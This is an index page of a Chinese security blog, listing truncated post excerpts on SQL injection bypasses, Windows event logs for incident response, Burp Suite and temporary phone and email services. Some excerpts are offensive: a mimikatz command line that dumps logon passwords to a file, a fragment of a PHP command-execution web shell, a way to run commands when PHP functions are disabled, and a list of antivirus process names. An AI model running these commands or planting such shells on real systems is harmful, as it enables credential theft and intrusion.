摘要:sql注入lMySqlMySQL False注入及技巧总结MySQL 注入攻击与防御sql注入学习总结 SQL注入防御与绕过的几种姿势MySQL偏门技巧mysql注入可报错时爆表名、字段名、库名高级SQL注入:混淆和绕过MSSQLMSSQL DBA权限获取WEBSHELL的过程 MSSQL 注入攻击 阅读全文
posted @ 2017-09-19 21:59 Hookjoy 阅读 (1113) 评论 (0) 编辑
摘要:1.记录 Mimikatz输出: C:\>mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir2.将输出导入到本地文件: C:\>mimikatz.exe ""privilege::de 阅读全文
posted @ 2015-09-20 00:06 Hookjoy 阅读 (1813) 评论 (0) 编辑
摘要:很多时候有些windows的服务器是支持wsh组建的,但是却执行不了命令,asp下执行被拒绝,php下执行报错,此时你可以借鉴以下的方法尝试。 php利用wsh突破函数禁用执行命令(安全模式同理)条件说明: 需要服务器是windows并支持wsh组建.且知道php安装目录php在IIS环境下利用ws 阅读全文
posted @ 2014-12-14 04:56 Hookjoy 阅读 (752) 评论 (0) 编辑
摘要:Windows应急日志常用的几个事件ID点击站内没有搜索到,可能搜索姿势不对,发一下吧,应急时可能会用到,根据日志时间点判断入侵日志路径:C:\Windows\System32\winevt\Logs查看日志:Security.evtx、System.evtx、Application.evtx如何查 阅读全文
posted @ 2019-07-18 15:30 Hookjoy 阅读 (124) 评论 (0) 编辑
摘要:array("pipe","r"),1 => array("pipe","w"),2 => array("pipe","w")); $cwd = getcwd(); $msg = php_uname()."\n------------Code by Spider-------------\n"; if($os == 'WIN') { $env = array('path' => 'c:... 阅读全文
posted @ 2019-07-16 12:02 Hookjoy 阅读 (17) 评论 (0) 编辑
只有注册用户登录后才能阅读该文。 阅读全文
posted @ 2019-07-09 13:08 Hookjoy 阅读 (3) 评论 (0) 编辑
摘要:windows操作系统事件日志 C:\Windows\System32\winevt\Logs\ *( XP C:\Windows\System32) 应用程序日志 App Event.Evtx(Application.evtx) 安全日志 SecEvent.Evtx 系统日志 SysEvent.E 阅读全文
posted @ 2019-07-01 22:32 Hookjoy 阅读 (76) 评论 (0) 编辑
只有注册用户登录后才能阅读该文。 阅读全文
posted @ 2019-06-26 22:38 Hookjoy 阅读 (3) 评论 (0) 编辑
摘要:官网:http://web-console.org/ 这个脚本可以实现web下交互,也就是有了这玩意后可以不用反弹shell了。 阅读全文
posted @ 2019-06-15 22:19 Hookjoy 阅读 (44) 评论 (0) 编辑
摘要:McAfeeFramework|McShield|McTaskManager|mfevtp|NIS|Updatesrv|VSSERV|iGateway|InoRPC|InoRT|InoTask|ccEvtMgr|ccSetMgr|DefWatch|SPBBCSvc|Symantec AntiViru 阅读全文
posted @ 2019-05-21 12:32 Hookjoy 阅读 (212) 评论 (0) 编辑
摘要:个人技术博客: 国内: http://blog.csdn.net/qq_27446553/ (qq_27446553博客) http://0x007.blog.51cto.com/6330498/1628943 (0x007博客) http://www.lorexxar.cn/(lorexxar博客 阅读全文
posted @ 2019-05-13 21:17 Hookjoy 阅读 (51) 评论 (1) 编辑
摘要:原文:https://www.anquanke.com/post/id/85925 作者:三思之旅 预估稿费:300RMB 投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿 在Web渗透测试过程中,BurpSuite是不可或缺的神器之一。BurpSuite的核心是代理Proxy, 阅读全文
posted @ 2019-04-23 22:40 Hookjoy 阅读 (171) 评论 (0) 编辑
摘要:临时手机:https://yunduanxin.net/ 临时邮箱 :https://linshiyou.com/ http://www.yopmail.com/zh/email-generator.php 国内外免费接收短信验证码https://www.pdflibr.com/SMSReceive 阅读全文
posted @ 2019-03-27 12:25 Hookjoy 阅读 (615) 评论 (0) 编辑